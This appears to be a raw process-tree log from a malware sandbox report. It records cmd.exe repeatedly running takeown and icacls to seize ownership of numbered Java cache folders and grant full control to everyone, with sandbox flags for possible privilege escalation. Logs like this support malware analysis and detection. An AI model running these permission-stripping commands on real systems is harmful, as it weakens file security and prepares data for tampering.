C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\14 && icacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\14 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\143⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\14 /grant everyone:(f)3⤵
- Modifies file permissions
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\15 && icacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\15 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\153⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\15 /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\16 && icacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\16 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\163⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\16 /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\17 && icacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\17 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\173⤵
- Possible privilege escalation attempt
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\17 /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\18 && icacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\18 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\183⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\18 /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\19 && icacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\19 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\193⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\19 /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\2 && icacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\2 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\23⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\2 /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\20 && icacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\20 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\203⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\20 /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\21 && icacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\21 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\213⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\21 /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\22 && icacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\22 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\223⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\22 /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\23 && icacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\23 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\233⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\23 /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\24 && icacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\24 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\243⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\24 /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\25 && icacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\25 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\253⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\25 /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\26 && icacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\26 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\263⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\26 /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\27 && icacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\27 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\273⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\27 /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\28 && icacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\28 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\283⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\28 /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\29 && icacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\29 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\293⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\29 /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\3 && icacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\3 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\33⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\3 /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\30 && icacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\30 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\303⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\30 /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\31 && icacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\31 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\313⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\31 /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\32 && icacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\32 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\323⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\32 /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\33 && icacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\33 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\333⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\33 /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\34 && icacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\34 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\343⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\34 /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\35 && icacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\35 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\353⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\35 /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\36 && icacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\36 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\363⤵
- Possible privilege escalation attempt
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\36 /grant everyone:(f)3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\37 && icacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\37 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\373⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\37 /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\38 && icacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\38 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\383⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\38 /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\39 && icacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\39 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\393⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\39 /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\4 && icacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\4 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\43⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\4 /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\40 && icacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\40 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\403⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\40 /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\41 && icacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\41 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\413⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\41 /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\42 && icacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\42 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\423⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\42 /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\43 && icacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\43 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\433⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\43 /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\44 && icacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\44 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\443⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\44 /grant everyone:(f)3⤵
- Possible privilege escalation attempt
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\45 && icacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\45 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\453⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\45 /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\46 && icacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\46 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\463⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\46 /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\47 && icacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\47 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\473⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\47 /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\48 && icacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\48 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\483⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\48 /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\49 && icacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\49 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\493⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\49 /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\5 && icacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\5 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\53⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\5 /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\50 && icacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\50 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\503⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\50 /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\51 && icacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\51 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\513⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\51 /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\52 && icacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\52 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\523⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\52 /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\53 && icacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\53 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\533⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\53 /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\54 && icacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\54 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\543⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\54 /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\55 && icacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\55 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\553⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\55 /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\56 && icacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\56 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\563⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\56 /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\57 && icacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\57 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\573⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\57 /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\58 && icacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\58 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\583⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\58 /grant everyone:(f)3⤵
- Possible privilege escalation attempt
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\59 && icacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\59 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\593⤵
- Possible privilege escalation attempt
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\59 /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\6 && icacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\6 /grant everyone:(f)2⤵
-
